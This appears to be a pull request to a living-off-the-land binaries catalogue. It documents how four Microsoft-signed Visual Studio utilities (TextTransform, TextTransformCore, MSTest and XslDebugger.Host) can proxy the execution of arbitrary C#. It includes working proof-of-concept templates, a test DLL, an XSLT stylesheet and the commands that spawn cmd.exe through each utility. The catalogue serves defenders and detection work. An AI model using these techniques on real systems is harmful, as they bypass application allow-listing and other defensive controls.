Add TextTransform.exe, TextTransformCore.exe, MSTest.exe and Microsoft.XslDebugger.Host.exe to the OtherMSBinaries category

[Pumi96]

Summary

This PR adds TextTransform.exe, TextTransformCore.exe, and MSTest.exe to the OtherMSBinaries category.

All three are Microsoft-signed command-line utilities included with Visual Studio. Their legitimate purposes involve development workflows: processing T4 text templates (.tt files) for code generation, and executing unit test assemblies.

The Execution Primitive

TextTransform / TextTransformCore:
Because T4 templates inherently support executing embedded C# or VB.NET code during the transformation process, an attacker can abuse either utility to proxy the execution of arbitrary C# payloads. (MITRE T1127)

Technical Note: Because TextTransformCore.exe runs on .NET Core, it requires explicit assembly references (like System.Diagnostics.Process) inside the template to execute certain actions, whereas the standard .NET Framework version has these available by default.

MSTest:
MSTest.exe is a legacy test execution runner. By crafting a malicious .NET DLL adorned with standard Unit Testing attributes ([TestClass], [TestMethod]), an attacker can force the runner to load the assembly and execute arbitrary code hidden within the test methods. (MITRE T1218)

Both vectors grant access to the underlying runtime (spawning processes, network connections, file system access) and can be used to bypass defensive controls that do not restrict trusted developer utilities.

Microsoft.XslDebugger.Host:
Microsoft.XslDebugger.Host.exe is an XSLT execution utility for Visual Studio. When invoked with /enable:all, it compiles and executes arbitrary C# code embedded in msxsl:script blocks within XSLT stylesheets. This grants full .NET Framework access including Process.Start() and WebClient.DownloadFile(), making it both an Execute and Download primitive. (MITRE T1220)

Proof of Concept 1: TextTransform.exe (.NET Framework)

1. Create a file named payload.tt containing the following embedded C# code:

<#@ template language="C#" #>
<#@ import namespace="System.Diagnostics" #>
<#
    Process.Start("cmd.exe");
#>

2. Execute the template using the utility:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe" -out output.txt payload.tt

3. Result: cmd.exe is successfully spawned as a child process.

Proof of Concept 2: TextTransformCore.exe (.NET Core)

1. Create a file named payload_core.tt containing the following embedded C# code with the required assembly references:

<#@ template language="C#" #>
<#@ assembly name="System.Diagnostics.Process" #>
<#@ assembly name="System.ComponentModel.Primitives" #>
<#@ import namespace="System.Diagnostics" #>
<#
    Process.Start("cmd.exe");
#>

2. Execute the template using the utility:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransformCore.exe" payload_core.tt

3. Result: cmd.exe is successfully spawned as a child process.

Proof of Concept 3: MSTest.exe

1. Create a file named MaliciousTest.cs containing the following C# code:

using Microsoft.VisualStudio.TestTools.UnitTesting;
using System.Diagnostics;

[TestClass]
public class LolbasTest
{
    [TestMethod]
    public void Execute()
    {
        Process.Start("cmd.exe");
    }
}

2. Compile the DLL using the built-in C# compiler:

csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs

4. Execute the payload using the test runner:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe" /testcontainer:MaliciousTest.dll /resultsfile:output.trx

5. Result: cmd.exe is successfully spawned as a child process of MSTest.exe.

Proof of Concept 4: Microsoft.XslDebugger.Host.exe (Execute + Download)

1. Create a minimal XML input file input.xml:

<?xml version="1.0"?><data>test</data>

2. Create an XSLT payload payload.xsl with embedded C#:

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:custom">
  <msxsl:script language="C#" implements-prefix="user"><![CDATA[
    public string execute() {
      System.Diagnostics.Process.Start("cmd.exe");
      return "done";
    }
  ]]></msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:execute()"/></xsl:template>
</xsl:stylesheet>

3. Execute:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe" input.xml payload.xsl /enable:all

4. Result: cmd.exe is successfully spawned as a child process.